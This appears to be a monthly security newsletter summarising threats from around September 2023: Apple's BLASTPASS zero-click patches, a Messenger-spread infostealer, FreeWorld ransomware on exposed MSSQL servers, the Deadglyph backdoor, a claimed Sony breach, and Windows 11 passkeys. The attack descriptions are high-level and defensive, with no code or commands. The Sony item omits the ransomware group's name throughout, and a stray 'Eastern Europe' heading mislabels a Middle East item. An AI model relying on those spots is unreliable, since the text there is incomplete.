Apple Security Updates iMessage Zero-click

Summary: Apple has recently released a security patch to fix two recently discovered zero-day vulnerabilities for iPhones. The vulnerabilities discovered by Citizen Lab at the University of Toronto’s Munk School and Apple are part of a zero-click exploit chain known as BLASTPASS. They allow threat actors to send malicious attachments that could deploy NSO Group’s Pegasus spyware. These vulnerabilities are CVE-2023-41061 and CVE-2023-41064:

  • CVE-2023-41061 – A validation issue in Apple Wallet that could lead to arbitrary code execution when handling maliciously crafted attachments.
  • CVE-2023-41064 – A buffer overflow issue in Image I/O that could lead to arbitrary code execution when processing maliciously crafted images.

Citizen Lab stated that the latest version of iOS (16.6) is vulnerable to these attacks and that CVE-2023-41064 “involved PassKit attachments containing malicious images sent from an attacker iMessage account to the victim.” Apple released security patches for vulnerable device beyond iPhones, including:

  • iOS 16.6.1 and iPadOS 16.6.1 – iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later
  • macOS Ventura 13.5.2 – macOS devices running macOS Ventura
  • watchOS 9.6.2 – Apple Watch Series 4 and later

Why it matters: The threat that these vulnerabilities pose is that zero-click malware does not require any user interaction, thus letting threat actors easily compromise the target’s device. In fact, these vulnerabilities have been actively exploited by threat actors. Unlike most well-known malware, the lack of interaction that is required for this attack cannot be prevented by common user training. As the second-largest market share holder in the world, millions of users are at risk. Given the severity of the vulnerabilities, it is important for all Apple users to update their devices.

Vietnamese Facebook Messenger Scam

Summary: A Vietnamese threat actor has created a botnet that spreads a malicious Python-based file through Facebook Messenger. The file is spread using fake and compromised Facebook accounts and targets Facebook Business accounts. Facebook’s ability to allow users to share files has been exploited by the threat actor by compressing the payload in either a .rar or .zip file. The archived file contains a single Windows batch file that then downloads more malicious content from GitHub or GitLab. The downloaded files then attempt to steal information such as the user’s session cookies or login credentials stored in the user’s computer and web browser.

Owners of Facebook Business accounts are likely to have other accounts, such as business or e-commerce, saved on their device. Once the malicious file is downloaded, the threat actor could gain access to those accounts as well. Additionally, this would allow the threat actors to not only compromise the user’s financial health, but also to add to their botnet of compromised accounts.

Why it matters: While phishing emails are the most popular form of phishing, there has been a growing trend of phishing using social media messaging. Although many people have training for email phishing, social media phishing adds a new layer of obfuscation through the ability to create realistic profiles or using existing compromised ones. These profiles would allow users an easier time to gain the trust of their target and to make it easier for them to trick the targets into downloading the malicious files. It is important to educate users of not only detecting suspicious emails but also suspicious social media messages.

FreeWorld, a Not so Free Software

Summary: Poorly secured, public-facing Microsoft SQL Servers are being targeted by threat actors to deploy Cobalt Strike payloads and FreeWorld ransomware. The threat actors as part of the DB#JAMMER campaigns are brute-forcing their way into Microsoft SQL Server accounts to use the database’s xp_cmdshell feature so that they may run commands on the compromised host.

Hackers originally attempted to establish persistence on the host by using RDP before pivoting to AnyDesk, a legitimate software that allows attackers and general users to gain access to a remote host. Upon compromise, the hackers deploy various tools such as enumeration software, RAT payloads, exploitation and credential stealing software, Cobalt Strike, and the Mimic ransomware variant FreeWorld. Upon the compromise of the accounts the malicious actor sets up a command-and-control platform on the host as well as a .txt file containing the ransom note.

Why it matters: This campaign is evidence of the danger of placing database servers in the public facing internet. Any existing system is at the risk of being targeted by malicious actors. Placing vulnerable systems in the public-facing internet further increases the chance of being targeted. Microsoft SQL Server holds a large market share, giving the threat actors a larger pool of potential victims. Ransomware is particularly costly that could cost companies millions of dollars. It is important for companies to implement better security and networking architecture for their hosts to help mitigate these types of attacks.

Deadglyph: Stealthy Malware Used in Government Attacks

Eastern Europe

Summary: The new modular backdoor Deadglyph is malware attributed to “Stealth Falcon APT (aka Project Raven or FruityArmor), a state-sponsored hacking group from the United Arab Emirates (UAE). So far, this malware has been seen conducting cyber espionage against a government agency in the Middle East. The hacking group has been known for targeting activists, journalists, and dissidents for almost a decade. According to an ESET news report: “Deadglyph’s architecture is unusual as it consists of cooperating components – one a native x64 binary, the other a .NET assembly. This combination is unusual because malware typically uses only one programming language for its components. This difference might indicate separate development of those two components while also taking advantage of unique features of the distinct programming languages they utilize.”

Unlike other traditional backdoors, the commands are received from an actor-controlled server in the form of additional modules that allow it to create new processes, read files, and collect information from the compromised systems. Different programming languages are also used, which is likely a deliberate tactic to hinder analysis, making it a lot more challenging to detect and minimize the risk of compromise. Deadglyph’s loading chain begins with a registry shellcode loader (DLL) that extracts code from the Windows registry to load the Executor (x64) component, which in turn loads the Orchestrator (.NET) component. Only the initial component exists on the compromised system’s disk as a DLL file, minimizing the likelihood of detection. ESET says the loader will load the shellcode from the Windows Registry, which is encrypted to make analysis more challenging.

Why it matters: As the DLL component is stored on the filesystem, it is more likely to be detected. Due to this, the threat actors utilized a homoglyph attack in the VERSIONINFO resource using distinct Greek and Cyrillic Unicode characters to mimic Microsoft’s information and appear as a legitimate Windows file. Although this specific tactic to avoid detection is currently limited to Stealth Falcon APT, it is likely other threat actors may adopt this methodology as it is effective in its ability to hide from detection. It’s also important to note that the initial infection is presently unknown, and only constant vigilance of emerging threats is proven to minimize the risk associated with these kinds of exploits. States ‘All Of Sony Systems’ Hacked

Summary:, a ransomware group that has been active since September 2023, has stated: “’We have successfully compromissed [sic] all of sony systems. We wont ransom them! we will sell the data. due to sony not wanting to pay. DATA IS FOR SALE,” the group adds, before declaring “WE ARE SELLING IT”.’ has also posted a file tree of the entire leak, which appears to have less than 6,000 files – seemingly small for “all of Sony systems”. Included here are “build log files”, a wide range of Java resources, and HTML files. No price is listed for the data, but has left contact details for the Tox messaging service, as well as Telegram and email details.

According to the actor’s post, the data will be posted on September 28th if Sony refuses to pay by that date. “In cases where payment is not received, we are obligated to report a Data Privacy Law violation to the GDPR agency!” the group says on its leak site. Thus far, over 3.14 GB of uncompressed data, allegedly belonging to Sony, has been dumped on hacker forums. As of September 27th, Sony has made no official announcement of any hacking events that may have taken place but are investigating as a precaution due to the vast number of claims of hacking activity.

Why it matters: appears to be both a ransomware operator, and a  ransomware-as-a-service organization – it is currently advertising for “affiliates” to sign up.  Although the attack has not been confirmed by Sony, this threat actor’s capabilities appear to be growing, and is therefore imperative to be aware of emerging threats and to secure internet-facing resources to prevent future avenues of attack. It is also important that users are aware of new and emerging threats to ensure they safeguard passwords and corporate data to minimize the risk of exposure and attack surface.

Security Tip of the Month – Passkeys Coming to Windows 11

Summary: With the launch of the next feature update to Windows 11 (released on September 26th), Microsoft is enabling passkeys across the Operating System. Microsoft stated in its public announcement on September 21st that over 4,000 password-related attacks happen every second, and this update will hopefully allow a passwordless future. Beginning on release date, IT Admins will be able to remove the option to enter a password on devices that support Windows Hello for Business, prompting users to login with either facial recognition or fingerprint (depending on user preference and device capability).

Windows Hello was an option for IT Admins up until this update, where Microsoft is pushing this move away from password use. This feature also affects the use of browsers such as Edge and Chrome by allowing them to use biometric devices to authenticate users for website access, thereby negating the need for memorizing passwords for web authentication as well. Once user systems are updated, users will be prompted to create a passkey within Windows (for environments where that’s enabled), then users will be able to use their face or fingerprint to authenticate to their PC and any website that has passkeys enabled.

Why it matters: Passwords have an inherent risk. Users typically create passwords that are easily remembered, and in many cases, they are required to change/update those passwords frequently, which means those passwords are either easily remembered/guessed or are incremented as they are changed making new passwords easy to guess if old passwords are compromised. Passwords are also stored on servers, and even though they are encrypted, they are still vulnerable to being stolen and decrypted. Even hashed password values are at risk due to the existence of rainbow tables containing password combinations for specific hashes, therefore Microsoft (along with other tech giants like Apple and Google) all support passkeys and are pushing for a truly passwordless future.